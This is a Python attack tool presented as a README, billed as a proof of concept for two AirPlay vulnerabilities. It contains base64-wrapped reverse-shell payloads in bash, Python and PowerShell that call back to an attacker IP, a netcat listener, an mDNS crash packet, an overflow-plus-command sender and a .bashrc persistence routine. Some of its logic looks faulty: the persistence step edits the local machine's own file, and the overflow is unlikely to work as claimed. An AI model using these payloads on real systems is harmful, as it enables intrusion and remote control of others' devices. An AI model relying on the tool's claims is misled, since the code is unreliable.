README.md
Rendering markdown...
#!/usr/bin/env python3
# AirBorne Elite Edition — Full RCE with Listener & Persistence
# Created by ekomsSavior | Team EVA Forever
import socket
import base64
import argparse
import subprocess
import threading
import time
import os
from scapy.all import *
def print_banner():
print(r"""
___ _________________ ___________ _ _ _____
/ _ \|_ _| ___ \ ___ \| _ | ___ \ \ | || ___|
/ /_\ \ | | | |_/ / |_/ /| | | | |_/ / \| || |__
| _ | | | | /| ___ \| | | | /| . ` || __|
| | | |_| |_| |\ \| |_/ /\ \_/ / |\ \| |\ || |___
\_| |_/\___/\_| \_\____/ \___/\_| \_\_| \_/\____/
CVE-2025-24252 & CVE-2025-24132 PoC + RCE + Persistence
""")
# --- Payload Generators ---
def generate_payload(attacker_ip, port, method, command):
if method == "bash":
shell = f"bash -i >& /dev/tcp/{attacker_ip}/{port} 0>&1"
elif method == "bash_own_command":
shell = command
elif method == "python":
shell = (
f"python3 -c 'import socket,os,pty;s=socket.socket();"
f"s.connect((\"{attacker_ip}\",{port}));"
f"os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
f"os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'"
)
elif method == "powershell":
shell = (
f"powershell -nop -w hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',{port});"
f"$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};"
f"while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;"
f"$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
f"$sendback = (iex $data 2>&1 | Out-String );"
f"$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
f"$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
f"$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\""
)
else:
raise ValueError("Invalid payload method.")
encoded = base64.b64encode(shell.encode()).decode()
return f"echo {encoded} | base64 -d | bash".encode()
# --- Persistence (Linux .bashrc) ---
def add_persistence(attacker_ip, port, method):
print("[*] Adding persistence to ~/.bashrc...")
payload = generate_payload(attacker_ip, port, method, "").decode()
try:
with open(os.path.expanduser("~/.bashrc"), "a") as f:
f.write(f"\n# EVA PERSISTENCE\n{payload}\n")
print("[+] Persistence added.")
except Exception as e:
print("[-] Failed to add persistence:", e)
# --- Netcat Listener (runs in background) ---
def start_listener(port):
def listener():
print(f"[*] Starting Netcat listener on port {port}...")
subprocess.call(["nc", "-lvnp", str(port)])
thread = threading.Thread(target=listener)
thread.daemon = True
thread.start()
time.sleep(1)
# --- CVE-2025-24252 (mDNS crash) ---
def exploit_24252(interface):
print("[*] Launching CVE-2025-24252 (mDNS TXT Crash)...")
packet = IP(dst="224.0.0.251") / UDP(sport=5353, dport=5353) / DNS(
qr=0,
opcode=0,
qdcount=1,
ancount=1,
qd=DNSQR(qname="AirPlay._tcp.local", qtype="PTR"),
an=DNSRR(rrname="AirPlay._tcp.local", type="TXT", rdata="A" * 5000)
)
send(packet, iface=interface, count=1)
print("[+] mDNS crash packet sent on interface:", interface)
# --- CVE-2025-24132 (Heap Overflow + Reverse Shell) ---
def exploit_24132(target_ip, attacker_ip, port, method, persistent, command):
print(f"[*] Launching CVE-2025-24132 (Heap Overflow + RCE)...")
start_listener(port)
try:
sock = socket.create_connection((target_ip, 7000), timeout=5)
overflow = b"A" * 1024
payload = generate_payload(attacker_ip, port, method, command)
full_payload = overflow + b"\n" + payload + b"\n"
sock.sendall(full_payload)
sock.close()
print("[+] Payload delivered. Check your shell.")
except Exception as e:
print("[-] Exploit failed:", e)
if persistent:
add_persistence(attacker_ip, port, method)
# --- CLI Setup ---
def main():
print_banner()
parser = argparse.ArgumentParser(description="AirBorne Elite PoC Exploit Tool")
parser.add_argument("--exploit", required=True, choices=["24252", "24132"], help="Which CVE to run")
parser.add_argument("--interface", help="Interface for CVE-24252")
parser.add_argument("--target", help="Target IP (for CVE-24132)")
parser.add_argument("--attacker", help="Your IP for reverse shell")
parser.add_argument("--port", default="4444", help="Port for reverse shell")
parser.add_argument("--payload", default="bash", choices=["bash", "bash_own_command", "python", "powershell"], help="Payload type")
parser.add_argument("--persistent", action="store_true", help="Enable real persistence (Linux only)")
parser.add_argument("--command", help="Custom command for bash payload (if using bash_own_command)")
args = parser.parse_args()
if args.exploit == "24252":
if not args.interface:
print("[-] Interface is required for mDNS attack.")
return
exploit_24252(args.interface)
elif args.exploit == "24132":
if not args.target or not args.attacker:
print("[-] Target and attacker IP required.")
return
exploit_24132(args.target, args.attacker, int(args.port), args.payload, args.persistent, args.command)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Stopped by user.")